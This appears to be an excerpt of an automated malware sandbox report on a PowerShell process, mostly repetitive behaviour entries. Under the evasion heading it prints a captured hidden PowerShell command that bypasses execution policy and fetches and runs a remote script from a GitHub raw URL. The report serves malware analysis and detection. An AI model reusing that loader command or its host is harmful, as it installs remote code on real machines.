Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4105Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5745Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: ModuleAnalysisCache.0.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.0.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.0.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\whoami.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
